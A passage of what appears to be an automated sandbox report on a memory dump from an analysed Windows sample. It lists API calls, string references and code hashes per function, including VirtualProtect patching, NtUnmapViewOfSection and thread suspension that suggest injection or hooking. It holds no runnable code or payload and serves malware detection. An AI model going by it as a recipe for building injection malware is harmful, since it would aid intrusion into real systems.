    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
